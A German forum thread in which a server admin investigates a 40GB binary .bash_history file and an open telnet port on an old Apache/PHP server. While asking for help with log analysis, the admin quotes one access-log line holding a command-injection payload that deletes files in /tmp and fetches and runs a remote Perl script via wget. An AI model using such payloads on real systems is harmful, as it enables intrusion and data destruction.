böser Angreifer?

A

arthur

Registered User
Hallo zusammen,
ich habe auf einer alten Suse8.2 einen webserver apache 2.0.51 laufen.
Ausserdem seit ein paar Tagen php5.0.5 vorher 5.0.2
Die Maschine hat sich relativ normal verhalten allerdings durfte ich
heute feststellen, dass die Datei /var/lib/wwwrun/.bash_history ca 40GB groß
war. Bevor Fragen kommen : ich habe Sie gelöscht. Ja ich weiss, war dumm :confused:
Ich habe vorher mal einen Blick darauf geworfen: binaer
Hat da jemand das System angegriffen? - wie bekomme ich es raus?
Oder ist das ein seltsamer DOS Angriff?
Ich habe mal
- per chkrootkit gesucht
- per ps gesucht
- per top gesucht
- per nmap gescannt
- Dateien von wwwrun gesucht
und nur eine Auffälligkeit gefunden: der telnet-port war auf?
Das ist mir unklar, ich kann mich nicht daran erinnert das frei gegeben
zu haben, (inetd), und eigentlich traue ich mir das auch nicht zu. :)

Kann mir jemand einen Hinweis geben - hat dieses Verhalten schonmal erlegt?
Vielleicht hat ja auch nur der Indianer zuviel Feuerwasser zu sich genommen
und irgendein Prozess dreht ab? Ach ja, apache habe ich neu gestartet.
(Hoffnung)
Nun denn
Gruß und Danke
 
Ja in den Accesslogs solltest du noch nachschauen, wenn du keine Auffälligen Dateien / Prozesse findest und dein Traffic "normal" ist, dann sollte aber keine Gefahr im Vollzug sein :)
 
Tja die Logfiles.
Kennt jemand einen guten "Analysator" für so etwas?
Ich hab mal darueber geschaut und finde durchaus die Versuche - so nehme ich jedenfalls an -
eine Datei auf dem Server zu hinterlegen. Ich habe gezielt nach wget gesucht.
Beispiel:
10.100.0.200 - - [10/Aug/2005:01:39:44 +0200] "GET /index.php?relative_script_path=|echo%2
0;cd%20/tmp;rm%20-rf%20*;wget%20http://members.lycos.co.uk/futpemata/t;perl%20t;echo%20;rm
%20-rf%20t*;echo| HTTP/1.1" 200 1984
Gruß
 
Naja die Versuche werden dir immer unterkommen.
Es gibt auf jedem Server immer versuche von sog. "Scannern" sich per FTP oder SSH einzuloggen, oder eben ein Script zu speichern auf deinem Server.

Hauptsache ist: Es klappt nicht :)
Solange es bei den Versuchen bleibt kannst du relativ wenig machen, ausser ein paar IPs per IP Tables Sperren oder so..
 
Aber was war's dann

Tja, bleibt zu sagen: Einen "guten" Angreifer würde ich wahrscheinlich übersehen, der kann's
aber wohl kaum sein, dann würde er keine 40GB großen Dateien anhäufen, die selbst mir
dann auffallen :). Bleibt nur die Frage: woran lag's? Wie kommt es, das wwwrun eine dermaßen
große Datei anlegt? Irgendwas beim Apache schiefgelaufen? Aber was?
Na gut, ich danke auf jeden Fall für die Meinungen.
 
You must log in or register to reply here.
Back
Top